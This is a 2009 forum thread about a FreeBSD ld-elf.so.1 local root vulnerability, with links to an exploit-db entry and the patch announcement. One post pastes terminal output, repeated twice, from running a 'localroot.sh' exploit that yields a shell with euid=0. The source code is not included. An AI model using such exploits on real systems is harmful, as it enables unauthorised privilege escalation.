# FreeBSD Run-Time Link-Editor Local r00t Zeroday (with exploit)



## kegf (Dec 1, 2009)

http://www.exploit-db.com/exploits/10255


----------



## kegf (Dec 1, 2009)

message in mailing lists and patch availabe in here - http://docs.freebsd.org/cgi/getmsg.cgi?fetch=0+0+current/freebsd-announce


----------



## mk (Dec 1, 2009)

the link redirect to wikipedia - so manualy open the web then navigate to the link for fbsd eploit is on the first page in local eploit


----------



## kegf (Dec 1, 2009)

first link is don't work, this is right link


----------



## SirDice (Dec 1, 2009)

Neat :e

Works on 7.2-STABLE too


```
dice@williscorto:~/test>uname -a
FreeBSD williscorto.dicelan.home 7.2-STABLE FreeBSD 7.2-STABLE #0: Wed Oct 21 19:28:48 CEST 2009     root@molly.dicelan.home:/usr/obj/usr/src/sys/CORTO  i386
dice@williscorto:~/test>./localroot.sh 
env env.c localroot.sh program.c program.o test.sh w00t.so.1.0 FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
ALEX-ALEX
# id -a
uid=1001(dice) gid=1001(dice) euid=0(root) groups=1001(dice),5(operator),1004(mldonkey)
# 
dice@williscorto:~/test>uname -a
FreeBSD williscorto.dicelan.home 7.2-STABLE FreeBSD 7.2-STABLE #0: Wed Oct 21 19:28:48 CEST 2009     root@molly.dicelan.home:/usr/obj/usr/src/sys/CORTO  i386
dice@williscorto:~/test>./localroot.sh 
env env.c localroot.sh program.c program.o test.sh w00t.so.1.0 FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function 'main':
env.c:5: warning: incompatible implicit declaration of built-in function 'malloc'
env.c:9: warning: incompatible implicit declaration of built-in function 'strcpy'
env.c:11: warning: incompatible implicit declaration of built-in function 'execl'
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
/libexec/ld-elf.so.1: environment corrupt; missing value for 
ALEX-ALEX
# id -a
uid=1001(dice) gid=1001(dice) euid=0(root) groups=1001(dice),5(operator),1004(mldonkey)
#
```


----------

